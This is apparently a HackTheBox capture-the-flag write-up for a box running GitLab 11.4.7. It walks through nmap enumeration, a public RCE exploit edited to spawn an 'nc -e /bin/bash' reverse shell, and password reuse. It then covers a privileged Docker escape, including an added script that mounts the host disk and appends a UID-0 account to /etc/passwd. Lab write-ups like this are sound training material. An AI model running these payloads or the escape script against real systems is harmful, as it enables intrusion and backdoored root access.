![83ba1160aed40b9e82489fb164a0941a.png](5ac295132433425db83e686264c6779a.png)
### Port Scanning and General Enumeration (Nmap)
`nmap -sV -sC -oN nmap/initial -T4 10.10.10.220`
![01766e66f07b0532c6eafa237ac4f942.png](9639a4557dff4f29b40a47a859d98dc6.png)
Only two ports: 22 (SSH) and... 5080? That's not a standard port, so let's see what's listening on it.
![24bf77ebc310c17fafc4155a938cb2db.png](47be9c791e674ceba17667fd2b732371.png)
**Gitlab!**
---
### Access (searchsploit, gitlab)
Let's find out which version of **Gitlab** we're working with:
1. `top right, drop down menu`
2. `help`
![b13dab13c8034866bf0bb34683274d86.png](b33aa49d82b44f4cb87802ba176f4343.png)
Gitlab version **11.4.7**
Checking **searchsploit** for public exploits for **Gitlab 11.4.7**
![f5dffc1577a8836b259fa7323b824e4a.png](12b8d606802146f8a628e183d6ece5fd.png)
I used the first one, but it needs a small edit before it works. Here's the payload line I changed it to:
```python
open(\\'|""" + f'nc -e /bin/bash YOURIP YOURPORT' + """ \\').read\\"]
```
The original payload line didn't work against this target; this one should. Replace *YOURIP* and *YOURPORT* with the IP and port your listener is on.
Start a listener
`nc -lvnp 4444`
And run the script!
`python3 exploit.py -u YOURUSERNAME -p YOURPASSWORD -g http://10.10.10.220 -l YOURIP -P YOURPORT`
(note the capital `-P` for the listener port; lowercase `-p` is already taken by the Gitlab password)
![4abde2a4dc33c1d5565376d1d8fce23b.png](44f85e16d48b45f788bc17eafee05d22.png)
![a4d0888417d0169ff9a002813cc900cd.png](d8bb5c9fcf4448849a43b63d2a4b8b66.png)
> **Quick tip!**
> > You may want to stabilize your shell at this point. A quick and dirty way to do so is:
> > ```bash
> > python3 -c 'import pty; pty.spawn("/bin/bash")'
> > export TERM=xterm
> > ```
---
### Privesc Part 1 (password-reuse, linpeas)
**Linpeas** kicks back a *lot* of juicy information, but this box has some curveballs and 90% of it is irrelevant to finishing the box. This is definitely a case of **K.I.S.S.**
> **K.I.S.S.**
> > *keep it simple stupid*
The two main things we're after here:
![d9ce8df9f740548c9246af17a2c3026d.png](765d36c223a34f75ac273cd8351556ea.png)
![fccc2c3c7c79fc065a7bfa93b8d3aae6.png](505d908d0cc44c7c94b6a3cfeb0eb73d.png)
*keep that in mind for later*
First thing you should *always* do when you find a plaintext password? Use it! Use it everywhere: `su` to every user with a shell, `sudo`, the Gitlab login, SSH on port 22.
Turns out...
![b6c79cbcac5221a07c57150b84d12491.png](2d902d3c6ae9472485fbd7b549cc786f.png)
Let's capture the root fla---
![9426a1f8f5cc67202869a88d2213e5ea.png](954c67f9f8d242788a64f4c7e1c4404e.png)
We're root, but only inside a Docker container, not on the host. Well, let's try to escape the container then!
---
### Privesc Part 2: ESCAPE-trick boogaloo (deepce, docker escape)
First things first when trying to do anything: **Enumeration**. We'll be using **deepce**. It's very similar to **Linpeas**. It's *amazing*.
The interesting finding:
![f8149f7bcc56c9c6039362eef57007d0.png](1987a99903c34ce9bd012e73438d31bc.png)
A container started with `--privileged` keeps the full Linux capability set and sees the host's devices under `/dev`. Being root inside it therefore means we can mount the host's disk and write to the host's filesystem as root, which is exactly the escape we need.
The other cool feature of **deepce** is it has an **exploit** mode
`./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce`
*you can read about the available exploits by following the link above in **Reading/Resources***
The **PRIVILEGED** exploit mounts the host disk and adds the user you named as a root (UID 0) account on the host with the password you gave it. All that's left to do is **ssh** to 10.10.10.220 as that new root user!
![154c1dc595d2bc4301525500c4c6cbfe.png](cdf082bdb53f4c63b32984dffb5eb685.png)
![9cb7b52fb2f22b63008b10aa39f7584c.png](b1236b1f10654db1b99ae9fb3b92572d.png)
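To make the privileged-container finding and the escape concrete, here is an added example (my own script, not deepce's code and not from the original box write-up) that performs the two checks a **PRIVILEGED** finding rests on and then does the same kind of escape: check the effective capability mask in `/proc/self/status`, list the host's whole disks from `/proc/partitions`, then mount the host root partition and append a UID-0 user. The device name `/dev/sda2`, the mount point `/mnt/host` and the account details are assumptions for illustration; confirm the right partition with the candidate list first.

```bash
#!/bin/sh
# Added example (not deepce's own code): the checks behind a PRIVILEGED
# finding and the escape they enable. Device names, the mount point and the
# account written to the host are assumptions for illustration.

# 1. Capabilities. /proc/self/status reports the effective set (CapEff) as a
#    hex bitmask; a --privileged container holds every bit. 3fffffffff is the
#    full set on kernels with 38 capabilities, 1fffffffff on older ones with 37.
is_privileged_caps() {
    capmask=$(printf '%s' "$1" | tr 'A-F' 'a-f' | sed 's/^0*//')
    case "$capmask" in
        3fffffffff|1fffffffff) return 0 ;;
        *) return 1 ;;
    esac
}

current_cap_eff() {
    awk '/^CapEff:/ { print $2 }' /proc/self/status
}

# 2. Devices. A privileged container sees the host's block devices. Given the
#    text of /proc/partitions, print whole disks (sda, vda, nvme0n1), which are
#    the candidates for the host's root filesystem; their partitions (sda1,
#    sda2, ...) are listed separately in the same file.
host_disk_candidates() {
    printf '%s\n' "$1" | awk '$1 ~ /^[0-9]+$/ { print $4 }' \
        | grep -E '^(sd[a-z]+|vd[a-z]+|nvme[0-9]+n[0-9]+)$'
}

# 3. The escape. Mount the host's root partition and append a UID-0 account
#    whose password hash sits directly in /etc/passwd (pam_unix honours that
#    field when it is not "x"). This is what the deepce PRIVILEGED exploit
#    boils down to; afterwards you ssh to the host as that user.
#    Run this only on a box you are authorised to attack.
escape_add_root_user() {
    disk="$1"        # e.g. /dev/sda2 (assumed; check host_disk_candidates first)
    user="$2"
    pass="$3"
    mnt=/mnt/host    # assumed mount point inside the container
    mkdir -p "$mnt" && mount "$disk" "$mnt" || return 1
    hash=$(openssl passwd -6 "$pass")    # SHA-512 crypt hash (OpenSSL 1.1.1+)
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$user" "$hash" >> "$mnt/etc/passwd"
    umount "$mnt"
}

# Report when run directly inside a container: sh privcheck.sh --report
report() {
    if is_privileged_caps "$(current_cap_eff)"; then
        echo "[+] full capability set: container looks --privileged"
    else
        echo "[-] reduced capability set"
    fi
    echo "[*] host disk candidates:"
    host_disk_candidates "$(cat /proc/partitions)"
}

case "${1:-}" in
    --report) report ;;
esac
```

Two caveats when you use it for real: the new account is UID 0, so sshd treats it as root and `PermitRootLogin` must allow password logins (it did on this box, which is why the ssh step works); and a non-privileged container typically shows a CapEff such as `00000000a80425fb`, so the mask check alone tells you whether the `/dev` disk route is even worth trying.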
---
Back to [[HackTheBox Index]]
Tags: #htb #hackthebox #gitlab #searchsploit #linpeas #deepce #docker_escape #box_writeups
Related: